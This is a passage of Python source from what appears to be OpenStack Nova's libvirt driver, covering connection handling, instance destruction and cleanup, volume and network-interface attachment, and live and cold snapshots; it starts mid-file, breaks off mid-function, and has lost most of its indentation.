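# (100 KiB): get_console_output() keeps only the last MAX_CONSOLE_BYTES
# bytes of the log.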
MAX_CONSOLE_BYTES = 102400
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 6)
# When MIN_LIBVIRT_VERSION matches/exceeds the version below,
# delete it & the corresponding code using it
MIN_LIBVIRT_HOST_CPU_VERSION = (0, 9, 10)
MIN_LIBVIRT_CLOSE_CALLBACK_VERSION = (1, 0, 1)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 0, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
def libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._caps = None
self._vcpu_total = 0
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
vif_class = importutils.import_class(CONF.libvirt_vif_driver)
self.vif_driver = vif_class(self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt_volume_drivers, self)
self._host_state = None
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
        self.valid_cachemodes = ["default",
                                 "none",
                                 "writethrough",
                                 "writeback",
                                 "directsync",
                                 "unsafe",
                                 ]
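        # Each disk_cachemodes entry is '<source_type>=<cache_mode>', e.g.
        # "file=directsync" makes file-backed disks use directsync; entries
        # with an unknown cache mode are logged and skipped below.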
for mode_str in CONF.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_('Invalid cachemode %(cache_mode)s specified '
'for disk type %(disk_type)s.'),
{'cache_mode': cache_mode, 'disk_type': disk_type})
continue
self.disk_cachemodes[disk_type] = cache_mode
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
            # Some filesystems (e.g. GlusterFS via FUSE) don't support
            # O_DIRECT though. For those we fall back to 'writethrough',
            # which gives host crash safety and is safe for migration
            # provided the filesystem is cache coherent (cluster filesystems
            # typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
def _munge_version(ver):
return ver[0] * 1000000 + ver[1] * 1000 + ver[2]
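        # _munge_version packs (major, minor, micro) into one comparable
        # integer, e.g. (0, 9, 6) -> 9006 and (1, 0, 1) -> 1000001, matching
        # the encoding returned by getLibVersion()/getVersion().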
try:
if lv_ver is not None:
libvirt_version = self._conn.getLibVersion()
if libvirt_version < _munge_version(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = self._conn.getVersion()
if hypervisor_version < _munge_version(hv_ver):
return False
if hv_type is not None:
hypervisor_type = self._conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread.
"""
if self._event_queue is None:
LOG.debug("Event loop thread is not active, "
"discarding event %s" % event)
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
self.emit_event(event)
except native_Queue.Empty:
pass
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def init_host(self, host):
if not self.has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.'),
{'major': major, 'minor': minor, 'micro': micro})
libvirt.registerErrorHandler(libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
def _get_connection(self):
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
LOG.debug(_('Connecting to libvirt: %s'), self.uri())
if not CONF.libvirt_nonblocking:
wrapped_conn = self._connect(self.uri(), self.read_only)
else:
wrapped_conn = tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
self._connect, self.uri(), self.read_only)
with self._wrapped_conn_lock:
self._wrapped_conn = wrapped_conn
try:
LOG.debug("Registering for lifecycle events %s" % str(self))
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception:
LOG.warn(_("URI %s does not support events"),
self.uri())
if self.has_min_version(MIN_LIBVIRT_CLOSE_CALLBACK_VERSION):
try:
LOG.debug("Registering for connection events: %s" %
str(self))
wrapped_conn.registerCloseCallback(
self._close_callback, None)
except libvirt.libvirtError:
LOG.debug(_("URI %s does not support connection events"),
self.uri())
return wrapped_conn
_conn = property(_get_connection)
def _close_callback(self, conn, reason, opaque):
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
LOG.info(_("Connection to libvirt lost: %s") % reason)
self._wrapped_conn = None
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug(_('Connection to libvirt broke'))
return False
raise
@staticmethod
def uri():
if CONF.libvirt_type == 'uml':
uri = CONF.libvirt_uri or 'uml:///system'
elif CONF.libvirt_type == 'xen':
uri = CONF.libvirt_uri or 'xen:///'
elif CONF.libvirt_type == 'lxc':
uri = CONF.libvirt_uri or 'lxc:///'
else:
uri = CONF.libvirt_uri or 'qemu:///system'
return uri
@staticmethod
def _connect(uri, read_only):
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
LOG.warning(
_("Can not handle authentication request for %d credentials")
% len(creds))
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
_connect_auth_cb,
None]
try:
if read_only:
return libvirt.openReadOnly(uri)
else:
return libvirt.openAuth(uri, auth, 0)
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
notifier.notify(nova_context.get_admin_context(),
notifier.publisher_id('compute'),
'compute.libvirt.error',
notifier.ERROR,
payload)
pass
def get_num_instances(self):
"""Efficient override of base instance_exists method."""
return self._conn.numOfDomains()
def instance_exists(self, instance_name):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance_name)
return True
except exception.NovaException:
return False
def legacy_nwinfo(self):
return True
# TODO(Shrews): Remove when libvirt Bugzilla bug # 836647 is fixed.
def list_instance_ids(self):
if self._conn.numOfDomains() == 0:
return []
return self._conn.listDomainsID()
def list_instances(self):
names = []
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._lookup_by_id(domain_id)
names.append(domain.name())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
# extend instance list to contain also defined domains
names.extend([vm for vm in self._conn.listDefinedDomains()
if vm not in names])
return names
def list_instance_uuids(self):
uuids = set()
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._lookup_by_id(domain_id)
uuids.add(domain.UUIDString())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
# extend instance list to contain also defined domains
for domain_name in self._conn.listDefinedDomains():
try:
uuids.add(self._lookup_by_name(domain_name).UUIDString())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
return list(uuids)
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for (network, mapping) in network_info:
self.vif_driver.plug(instance, (network, mapping))
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
for (network, mapping) in network_info:
self.vif_driver.unplug(instance, (network, mapping))
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.NotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
if state == power_state.SHUTDOWN:
is_okay = True
elif errcode == libvirt.VIR_ERR_OPERATION_TIMEOUT:
LOG.warn(_("Cannot destroy instance, operation time out"),
instance=instance)
reason = _("operation time out")
raise exception.InstancePowerOffFailure(reason=reason)
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_('Error from libvirt during destroy. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.NotFound:
LOG.error(_("During wait destroy, instance disappeared."),
instance=instance)
raise loopingcall.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_("Instance destroyed successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
# NOTE(wangpan): If the instance was booted again after destroy,
            #                this may be an endless loop, so check the id of
# domain here, if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise loopingcall.LoopingCallDone()
kwargs = {'is_running': False}
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_destroy,
old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_("Going to destroy instance again."), instance=instance)
self._destroy(instance)
def destroy(self, instance, network_info, block_device_info=None,
destroy_disks=True):
self._destroy(instance)
self._cleanup(instance, network_info, block_device_info, destroy_disks)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.NotFound:
virt_dom = None
if virt_dom:
try:
try:
virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug(_("Error from libvirt during undefineFlags."
" Retrying with undefine"), instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_('Error from libvirt during undefine. '
'Code=%(errcode)s Error=%(e)s') %
{'errcode': errcode, 'e': e}, instance=instance)
def _cleanup(self, instance, network_info, block_device_info,
destroy_disks):
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.NotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.error(_('Error from libvirt during unfilter. '
'Code=%(errcode)s Error=%(e)s') %
{'errcode': errcode, 'e': e},
instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
        # FIXME(wangpan): if the instance is booted again here, such as when
        #                 a soft reboot operation boots it here, it will
# become "running deleted", should we check and destroy
# it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
if destroy_disks:
target = libvirt_utils.get_instance_path(instance)
LOG.info(_('Deleting instance files %s'), target,
instance=instance)
if os.path.exists(target):
# If we fail to get rid of the directory
# tree, this shouldn't block deletion of
# the instance as whole.
try:
shutil.rmtree(target)
except OSError as e:
LOG.error(_('Failed to cleanup directory %(target)s: '
'%(e)s'), {'target': target, 'e': e})
#NOTE(bfilippov): destroy all LVM disks for this instance
self._cleanup_lvm(instance)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
libvirt_utils.remove_logical_volumes(*disks)
def _lvm_disks(self, instance):
"""Returns all LVM disks for given instance object."""
if CONF.libvirt_images_volume_group:
vg = os.path.join('/dev', CONF.libvirt_images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['name']
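            # For illustration: an instance named 'instance-00000001' matches
            # logical volumes such as 'instance-00000001_disk' and
            # 'instance-00000001_disk.local' under /dev/<volume group>.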
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = libvirt_utils.list_logical_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
disks = map(fullpath, disk_names)
return disks
return []
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug(_('Could not determine iscsi initiator name'),
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide node names'),
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide port names'),
instance=instance)
connector = {'ip': CONF.my_ip,
'host': CONF.host}
if self._initiator:
connector['initiator'] = self._initiator
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
def _cleanup_resize(self, instance, network_info):
target = libvirt_utils.get_instance_path(instance) + "_resize"
if os.path.exists(target):
shutil.rmtree(target)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def volume_driver_method(self, method_name, connection_info,
*args, **kwargs):
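        # Dispatch helper: connection_info['driver_volume_type'] (e.g.
        # 'iscsi') selects the driver registered via
        # CONF.libvirt_volume_drivers, and the named method such as
        # 'connect_volume' or 'disconnect_volume' is invoked on it.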
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
method = getattr(driver, method_name)
return method(connection_info, *args, **kwargs)
def attach_volume(self, connection_info, instance, mountpoint):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
conf = self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
except Exception as ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
                LOG.warn(_("During detach_volume, instance disappeared."))
else:
raise
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
@exception.wrap_exception()
def attach_interface(self, instance, image_meta, network_info):
virt_dom = self._lookup_by_name(instance['name'])
for (network, mapping) in network_info:
self.vif_driver.plug(instance, (network, mapping))
self.firewall_driver.setup_basic_filtering(instance,
[(network, mapping)])
cfg = self.vif_driver.get_config(instance, network, mapping,
image_meta)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError:
LOG.error(_('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, (network, mapping))
raise exception.InterfaceAttachFailed(instance)
@exception.wrap_exception()
def detach_interface(self, instance, network_info):
virt_dom = self._lookup_by_name(instance['name'])
for (network, mapping) in network_info:
cfg = self.vif_driver.get_config(instance, network, mapping, None)
try:
self.vif_driver.unplug(instance, (network, mapping))
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(instance)
def snapshot(self, context, instance, image_href, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
(image_service, image_id) = glance.get_remote_image_service(
context, instance['image_ref'])
try:
base = image_service.show(context, image_id)
except exception.ImageNotFound:
base = {}
_image_service = glance.get_remote_image_service(context, image_href)
snapshot_image_service, snapshot_image_id = _image_service
snapshot = snapshot_image_service.show(context, snapshot_image_id)
metadata = {'is_public': False,
'status': 'active',
'name': snapshot['name'],
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm as raw
if image_format == 'lvm':
image_format = 'raw'
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = image_format
metadata['container_format'] = base.get('container_format', 'bare')
snapshot_name = uuid.uuid4().hex
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
# These restrictions can be relaxed as other configurations
# can be validated.
if self.has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT) \
and not source_format == "lvm":
live_snapshot = True
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended. This operation also
            # confirms the running instance, as opposed to the system as a
# whole, has a new enough version of the hypervisor (bug 1193146).
try:
virt_dom.blockJobAbort(disk_path, 0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_CONFIG_UNSUPPORTED:
live_snapshot = False
else:
pass
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
snapshot_name,
image_type=source_format)
if live_snapshot:
LOG.info(_("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_("Beginning cold snapshot process"),
instance=instance)
snapshot_backend.snapshot_create()
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt_snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE (rmk): libvirt needs to be able to write to the
                    #             temp directory, which is owned by nova.
utils.execute('chmod', '777', tmpdir, run_as_root=True)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
if not live_snapshot:
snapshot_backend.snapshot_delete()
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
LOG.info(_("Snapshot extracted, beginning image upload"),
instance=instance)
# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
image_service.update(context,
image_href,
metadata,
image_file)
LOG.info(_("Snapshot image upload complete"),
instance=instance)
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's running XML file
xml = domain.XMLDesc(0)
def _wait_for_block_job(domain, disk_path):
status = domain.blockJobInfo(disk_path, 0)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if cur == end and cur != 0 and end != 0:
return False
else:
return True
# NOTE (rmk): We are using shallow rebases as a workaround to a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
